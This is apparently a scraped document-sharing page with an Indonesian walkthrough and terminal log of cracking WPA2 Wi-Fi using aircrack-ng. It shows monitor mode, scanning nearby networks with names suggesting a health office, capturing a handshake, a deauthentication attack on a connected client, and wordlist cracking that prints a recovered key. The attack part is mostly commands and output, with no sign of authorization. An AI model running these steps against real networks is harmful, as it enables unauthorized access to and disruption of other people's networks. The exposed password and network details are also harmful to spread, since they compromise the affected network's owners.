Vous êtes sur la page 1sur 4

Test hack wifi Hotspot

https://www.senitopeng.xyz/2017/12/cara-membuat-wordlist-di-termux.html
http://www.meretas.com/membuat-wordlist-linux/
https://id.wikihow.com/Meretas-Wi-Fi-WPA/WPA2-Dengan-Kali-Linux

root@Toshiba:~# airmon-ng

PHY Interface Driver Chipset

phy0 wlan0 iwl4965 Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] (rev 61)

root@Toshiba:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.


If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
468 NetworkManager
527 wpa_supplicant
550 dhclient

PHY Interface Driver Chipset

phy0 wlan0 iwl4965 Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] (rev 61)

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)


(mac80211 station mode vif disabled for [phy0]wlan0)

root@Toshiba:~# airmon-ng stop wlan0

PHY Interface Driver Chipset

phy0 wlan0mon iwl4965 Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] (rev 61)

root@Toshiba:~# airmon-ng check kill

Killing these processes:

PID Name
527 wpa_supplicant

root@Toshiba:~#

root@Toshiba:~# airodump-ng wlan0mon

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C4:A3:66:B6:E4:5A -54 33 61 0 10 130 WPA2 CCMP PSK Kesehatan


72:A3:66:B6:E4:59 -52 31 32 0 10 130 WPA2 CCMP PSK <length: 5>
BC:8A:E8:29:AC:11 -64 23 5 0 11 65 WPA2 CCMP PSK Duraring
60:18:88:BD:83:08 -82 50 13 0 4 130 WPA2 CCMP PSK Hotspot-Dinkes
62:E1:17:E3:94:76 -84 57 22 0 4 130 WPA2 CCMP PSK <length: 5>
8C:E1:17:E3:94:74 -83 60 27 0 4 130 WPA2 CCMP PSK melati
C0:4A:00:B3:E7:F0 -89 9 2 0 6 270 WPA2 CCMP PSK KE$EH4T@N
BSSID STATION PWR Rate Lost Frames Probe

(not associated) 4C:A5:6D:1B:C9:24 -59 0 - 1 116 110 ULFI,Kesehatan


(not associated) DA:A1:19:8D:08:F3 -76 0-1 0 1
(not associated) B2:23:86:02:DF:43 -76 0-1 0 2
(not associated) 96:98:36:93:34:7C -85 0-1 0 1
(not associated) 1C:77:F6:E8:06:DD -86 0-1 0 3
(not associated) 10:C3:7B:03:D5:3B -88 0-1 0 1
(not associated) A0:F3:C1:D4:FB:58 -90 0 - 1 0 165 Hotspot Dinas Keseha
(not associated) BC:8A:E8:20:D1:CA -90 0-1 0 1

root@Toshiba:~# airodump-ng -w Kesehatan -c 1 --bssid C4:A3:66:B6:E4:5A wlan0mon

root@Toshiba:~# airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

Airodump sekarang hanya akan memonitor jaringan sasaran, sehingga memungkinkan untuk mendapatkan informasi
yang lebih spesifik tentangnya. Hal yang saat ini benar-benar kita lakukan adalah menunggu suatu perangkat tersambung
atau tersambung ulang ke jaringan, memaksa router untuk mengirimkan four-way handshake yang dibutuhkan untuk bisa
meretas kata sandinya.

 Empat berkas juga akan muncul di desktop Anda. Handshake akan disimpan di sini ketika didapatkan, jangan
sampai dihapus! Tetapi, kita tidak sungguh-sungguh akan menunggu sampai ada perangkat yang tersambung.
Peretas yang tidak sabar tidak akan melakukannya.
 Sebenarnya kita akan menggunakan alat keren lain yang tercakup dalam paket aircrack. Alat yang disebut
aireplay-ng ini ditujukan untuk mempercepat proses. Alih-alih menunggu sampai suatu perangkat tersambung,
peretas menggunakan alat ini untuk memaksa perangkat tertentu menyambung ulang dengan mengirimkan paket
deauthentication (deauth) ke perangkat. Paket ini akan membuat perangkat berpikir untuk menyambung ulang ke
router. Agar alat ini bisa berfungsi, tentunya harus ada orang lain yang sebelumnya sudah tersambung ke jaringan.
Oleh karena itu, perhatikan airodump-ng dan tunggu sampai ada klien yang muncul. Bisa jadi butuh waktu lama,
tetapi mungkin juga hanya dibutuhkan sedetik sampai klien pertama muncul. Jika tidak ada yang muncul setelah
penantian panjang, jaringannya mungkin saat ini sedang kosong. Kemungkinan lainnya, Anda terlalu jauh dari
jaringan.

CH 1 ][ Elapsed: 43 mins ][ 2018-11-16 15:06 ][ WPA handshake: C4:A3:66:B6:E4:5A

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C4:A3:66:B6:E4:5A -50 100 13393 314040 38 1 130 WPA2 CCMP PSK Kesehatan

BSSID STATION PWR Rate Lost Frames Probe

C4:A3:66:B6:E4:5A 4C:1A:3D:87:71:18 -55 1e- 6 0 757


C4:A3:66:B6:E4:5A 94:E9:79:DE:2F:BD -62 24e- 1e 203 157 Kesehatan
C4:A3:66:B6:E4:5A 40:F0:2F:AC:B1:CD -62 0e- 1 10 11644
C4:A3:66:B6:E4:5A D4:6E:0E:0B:0C:DC -70 0e- 0e 0 109018
C4:A3:66:B6:E4:5A 80:C5:F2:A8:46:3D -76 1e- 0e 0 785
C4:A3:66:B6:E4:5A 18:F0:E4:6B:0B:E6 -79 1e- 6e 0 191

Buka terminal baru (Ctrl+Alt+T)


root@Toshiba:~# aireplay-ng --deauth 10 -a C4:A3:66:B6:E4:5A -c D4:6E:0E:0B:0C:DC wlan0mon
root@Toshiba:~# a i r e p l a y - n g – 0 2 – a [ r o u t e r b s s i d ] – c [ c l i e n t b s s i d ] m o n 0 .
root@Toshiba:~# aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

 Kode –0 adalah pintasan ke mode kematian dan angka 2 adalah jumlah paket deauth yang dikirimkan.
 -a mengindikasikan bssid access point (router). Ganti [router bssid] dengan BSSID jaringan yang disasar, misalnya
00:14:BF:E0:E8:D5
 -c mengindikasikan BSSID klien. Ubah [client bssid] dengan BSSID klien yang terkoneksi, BSSID ini bisa dilihat pada
“STATION.”
 Tentu saja mon0 adalah antarmuka monitor, ubah jika antarmuka Anda berbeda.

root@Toshiba:~# aireplay-ng

Aireplay-ng 1.3 - (C) 2006-2018 Thomas d'Otreppe


https://www.aircrack-ng.org

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : MAC address, Access Point


-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection

Replay options:

-x nbpps : number of packets per second


-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet

Fakeauth attack options:

-e essid : set target AP SSID


-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time

Arp Replay attack options:

-j : inject FromDS packets

Fragmentation attack options:

-k IP : set destination IP in fragments


-l IP : set source IP in fragments

Test attack options:

-B : activates the bitrate test

Source options:

-i iface : capture packets from this interface


-r file : extract packets from this pcap file

Miscellaneous options:

-R : disable /dev/rtc usage


--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
--deauth-rc rc : Deauthentication reason code [0-254] (Default: 7)

Attack modes (numbers can still be used):

--deauth count : deauthenticate 1 or all stations (-0)


--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)

--help : Displays this usage screen

No replay interface specified.

root@Toshiba:~# aircrack-ng -w /root/Desktop/Dark.lst -b C4:A3:66:B6:E4:5A /root/Kesehatan-01.cap

[00:00:00] 8/10854 keys tested (833.77 k/s)

Time left: 13 seconds 0.07%

KEY FOUND! [ 1sampai9 ]

Master Key : 39 EC 73 04 9A 60 3F 46 86 F9 33 6D 5F 69 C2 29
BD 1B 50 5F 44 E6 96 E4 0B C2 5F 07 44 98 13 B8

Transient Key : 00 E6 38 C5 8A 2E 99 B5 9E C8 B7 04 E6 F6 56 03
7F B1 06 B8 EB B9 AD CC 08 B0 D7 61 8E B5 2A 19
FF CD 19 97 B4 BD 85 75 FC 35 5C BB E2 85 F0 F4
33 7A 8E 9B 87 20 46 58 45 5F 5C 15 99 71 C7 91

EAPOL HMAC : BF FF 5F C2 BE 0A FB 98 88 8B 6B FF DE 92 68 8F

root@Toshiba:~#

Vous aimerez peut-être aussi